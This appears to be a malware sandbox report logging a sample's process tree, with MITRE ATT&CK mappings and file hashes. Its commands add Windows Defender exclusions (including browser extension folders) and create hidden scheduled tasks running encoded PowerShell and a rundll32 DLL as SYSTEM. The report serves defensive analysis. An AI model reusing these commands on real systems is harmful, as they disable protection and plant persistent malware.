[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JXqrxIFSrhCmC" /t REG_DWORD /d 0 /reg:64 | PID:3460
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:32 | PID:4824
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR" /t REG_DWORD /d 0 /reg:64 | PID:3304
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:32 | PID:1168
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YjQMAHbWU" /t REG_DWORD /d 0 /reg:64 | PID:212

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:32 | PID:2368
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dLghTkXXJYUn" /t REG_DWORD /d 0 /reg:64 | PID:2016
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UQYVlFmkpVlhWwVB /t REG_DWORD /d 0 /reg:32 | PID:3576

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UQYVlFmkpVlhWwVB /t REG_DWORD /d 0 /reg:64 | PID:4872
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | PID:2244
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | PID:1016
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | PID:1272

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | PID:1904
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA /t REG_DWORD /d 0 /reg:32 | PID:4660

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\IntOZJXjzgIlwSrYA /t REG_DWORD /d 0 /reg:64 | PID:1172

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YIXdnjwIixpMFthL /t REG_DWORD /d 0 /reg:32 | PID:4088
- System Location Discovery: System Language Discovery

[depth 3] C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YIXdnjwIixpMFthL /t REG_DWORD /d 0 /reg:64 | PID:5024
[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gZqXlPZcW" /SC once /ST 03:50:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | PID:4092
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gZqXlPZcW" | PID:4176
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gZqXlPZcW" | PID:4868

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "XzTTGfRHhsSQnOLDY" | PID:3804

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY" | PID:4664

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "XzTTGfRHhsSQnOLDY2" | PID:3460

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "XzTTGfRHhsSQnOLDY2" | PID:1168

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FWbuSwfZFsgwoXKWz" | PID:2016

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz" | PID:880
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FWbuSwfZFsgwoXKWz2" | PID:1004
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FWbuSwfZFsgwoXKWz2" | PID:5032
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "QARjdqhHkeUSJySsU" | PID:2808

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "QARjdqhHkeUSJySsU" | PID:4508
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "QARjdqhHkeUSJySsU2" | PID:5092
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "QARjdqhHkeUSJySsU2" | PID:1236
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "fQYKPzMybePlvBGQCyc" | PID:4840
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc" | PID:4012
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "fQYKPzMybePlvBGQCyc2" | PID:4056
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "fQYKPzMybePlvBGQCyc2" | PID:2400

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FIPQnGcqMxrFEWDuliU" | PID:2316

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU" | PID:4692

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FIPQnGcqMxrFEWDuliU2" | PID:4340
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FIPQnGcqMxrFEWDuliU2" | PID:4424

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "YIKgGKXxRbHNIaIyYyL" | PID:4748

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL" | PID:2216
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "YIKgGKXxRbHNIaIyYyL2" | PID:2208
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "YIKgGKXxRbHNIaIyYyL2" | PID:4868

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YjQMAHbWU\GJPBsU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "GqmqubHZBeiIxpo" /V1 /F | PID:4764
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "OQOjSEtbMvvyYjD" | PID:640
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "OQOjSEtbMvvyYjD" | PID:2156
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "OQOjSEtbMvvyYjD2" | PID:2860

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "OQOjSEtbMvvyYjD2" | PID:2016
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FKVxFcymEbpqvaq" | PID:4428

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FKVxFcymEbpqvaq" | PID:3012
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "FKVxFcymEbpqvaq2" | PID:4008

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "FKVxFcymEbpqvaq2" | PID:4196

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "rOGhtOyMLHtWlf" | PID:1468

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "rOGhtOyMLHtWlf" | PID:5056

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "geJJKyFMaGRjIf" | PID:4828
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "geJJKyFMaGRjIf" | PID:4944
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "iSixUSrJJvCYJ" | PID:4612
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "iSixUSrJJvCYJ" | PID:2012

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "iSixUSrJJvCYJ2" | PID:4296

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "iSixUSrJJvCYJ2" | PID:3492

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "vZzcwClkycEgo" | PID:4020
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "vZzcwClkycEgo" | PID:1616
- System Location Discovery: System Language Discovery

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "vZzcwClkycEgo2" | PID:2636

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "vZzcwClkycEgo2" | PID:4076

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "GqmqubHZBeiIxpo2" /F /xml "C:\Program Files (x86)\YjQMAHbWU\faAvUyh.xml" /RU "SYSTEM" | PID:1468
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /END /TN "GqmqubHZBeiIxpo" | PID:4876

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "GqmqubHZBeiIxpo" | PID:1340

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "xVzozZXYwkkdWg" /F /xml "C:\Program Files (x86)\CMKMbRFSZeNU2\ymlANau.xml" /RU "SYSTEM" | PID:3080
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "AGouOwHOLlnps2" /F /xml "C:\ProgramData\UQYVlFmkpVlhWwVB\BDWPyAV.xml" /RU "SYSTEM" | PID:4636
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "QARjdqhHkeUSJySsU2" /F /xml "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\OzBNeCy.xml" /RU "SYSTEM" | PID:3084
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "YIKgGKXxRbHNIaIyYyL2" /F /xml "C:\Program Files (x86)\JXqrxIFSrhCmC\DDLWHNh.xml" /RU "SYSTEM" | PID:4012
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task

[depth 2] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 1752 | PID:228
- Program crash

[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | PID:3312
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force | PID:2732

[depth 1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc | PID:4260

[depth 1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum | PID:1028

[depth 1] C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam | PID:1700

[depth 1] C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5116 -ip 5116 | PID:4904
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (1): Credentials In Files (1)
Downloads
Filesize 2KB
MD5 5d3cbc47ab224ef9422b5b0ee3073852
SHA1 2d6422de395dc2009525e35bbdba31d815c10188
SHA256 7d66cb7a422742729d2ced0b5207261f643bcb364a63a9fffe22913cf7cdc91d
SHA512 009c65f93894aeef7b3a7e08073712115649378f8b2e5c9befc3136aa0d14e9470530578f2f9a8eebeafa981526c191ddae9e7972b71c9afb4f240c299682380

Filesize 2KB
MD5 a4ecc709fa4dba82361bf02e4d6efffe
SHA1 1e31b963b8272adc67db7ac9a7e189c6086b56b5
SHA256 88c675f40d650105711e4084e66c8764fbb7526e8dd23ddfdb5d4ab58bcd4562
SHA512 477334f90f9bdd612653aef8f0cefb52eb23bbf4ba0152b9c13ca153415901c67c620aeef59f1f2e9d955ab6a2e4a879d72872485e6ee584e184a27b2340892a

Filesize 2KB
MD5 be2e531d4f0438745aea9b59a84acc7f
SHA1 62e4397a18fbf3746d9f3b310610e0a35fb4d526
SHA256 4d1e19ce6f66b5ea0edc15c7540e33ce00efa5a0d569808abbb9ff34cd5882a9
SHA512 8bdad069adbf3153b131063518252d291f9e87d9d1b02a4b2afd116377a4547870c2252c02668692716c1ba6abb031b91162a4960f6a8a4c4692361211b294e2

Filesize 2KB
MD5 bdb602c1dfcc21e8fa6a6730520b61b1
SHA1 c94e15d492b7018b74e80349103258a9eb0076a5
SHA256 0de45d0c8318205ce7d082799fdcafd70a54d36da350dec7be9c1ddf47a498a5
SHA512 1d91e2d7698dcf9bf3151f25c9a6b9a2fe858d6e8f66a919b1df04a53c1e0e0fb5263f02cf257c9a8cbb1f78ee3f354a451e7b04860a1c296de7fd502bbdfc47

Filesize 644KB
MD5 64ba3bd8709d2b89ca221f6cb30ec5bc
SHA1 0d217dcd86820d601b7983001a7e4a84ebdc304f
SHA256 e7f01034eecf646564917023707b607179d48404735561aaacdd6f3781f4b416
SHA512 247c8dd44057b513f34bcfb39f4650cf643065413767dcb2ec27f12e01dbae29bb24a1bf5ac16b603ea486fb2ccf7e4cb190f16d110aa95cab14847cfd49f226

Filesize 2KB
MD5 b23c00f2c45783ee3df03c19b74bc301
SHA1 5912a7d0f93d1570ab3f63462eb2c396c1601536
SHA256 fd49db1545336b779f3bf0731bc65622d5f9201c29fb81415373fa592393906a
SHA512 ab6d3db7f8ba5adb68b4bde2b8dde1f8399b0229dc69d027a636630ab20515f56a1f0c7449788aa3894266492fb2c02521dcae63545515c8888ab4ce050ceee4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\en\messages.json
Filesize 150B
MD5 33292c7c04ba45e9630bb3d6c5cabf74
SHA1 3482eb8038f429ad76340d3b0d6eea6db74e31bd
SHA256 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249
SHA512 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\pt_BR\messages.json
Filesize 161B
MD5 5c5a1426ff0c1128c1c6b8bc20ca29ac
SHA1 0e3540b647b488225c9967ff97afc66319102ccd
SHA256 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839
SHA512 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Filesize 1KB
MD5 def65711d78669d7f8e69313be4acf2e
SHA1 6522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256 aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA512 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ehjcjbdklhanfkcemjelopjanaednaan\1.0_0\_locales\es\messages.json
Filesize 186B
MD5 a14d4b287e82b0c724252d7060b6d9e9
SHA1 da9d3da2df385d48f607445803f5817f635cc52d
SHA256 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152
SHA512 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb

Filesize 15KB
MD5 e80cfe966b3a212d12e8b82b7e34f215
SHA1 c685ffdf154190eaed1a337b43a83c1a0549faa2
SHA256 a21680e766c2056b6389813410cb80a322986f36108c15bf7900a8f1f5238193
SHA512 066afde4701b66df01dfd45fdac2d6471b8dc1912eecda80379b555c5b7e489852de6d82e58175aa59f58a4a26f47d1854d7f38d96077b5a06a946f626135fdc

Filesize 11KB
MD5 98ff6d02798b4e25eadd4017d8405125
SHA1 74be7633ccd986db31c23078014eda24cda06d5e
SHA256 36204514d6d1f07046007e2f7f6bbdca7d5826949e5a9c18601e6c773baf40bf
SHA512 51aa74a24a9b9f2961be6bb94e539d54667ae7033feb89586c5f15a7e9ffb6db747a01bfffd980e63974d55897c0a27562f3672d0ae651faec2c3b6dee407a94

Filesize 11KB
MD5 00e86c77e0fead528cb6a70b48624f95
SHA1 bc5b6232792bec2ada0153988c4f592365f4cdf8
SHA256 479e81974cc7b2fab1be4d90f5763687e3536e69abd08cccc62e9e15857ef806
SHA512 516f11816aa330a056bd68e73bc552ce389b46c260371eeca6bddaa27205b85a9ec5c63ce01ba9570b3bb3b16855d98481eba2b62a40a516d8e761af50f95c18

Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize 11KB
MD5 9515d63ab6aba1849f36c24c5c5e101d
SHA1 158d1bb116e8c9428526898278daf5d9ee9e324f
SHA256 93c7a43262ab4086f892cebc0dd76f10ee1d29b3d14f1d0e983511150b8254fd
SHA512 0d0c579c3be5c1dd997b1f913be11fe48cc2bb061358f35588aec6d89ae27dfaa734471f877a3eb00536d3c327dee69998f1226bc7cd441e81a44714c63cd976

Filesize 7KB
MD5 ce5ddf4e81ccee60ca845de116ed10f0
SHA1 46dc7c3be4f5bcb4893a59f1d54ccbd60556a74f
SHA256 fb002c12910d80c8c775d00ff51235f079378b52f37950480b205f4a8fa52fa5
SHA512 fe606cf824d4894415171437a709af36fe1bd67eadbfd949729c0298473d1635ba4c3deea7af028f23dcdc2c8ec6788906a0fb1368a26957cb421662ba15bb96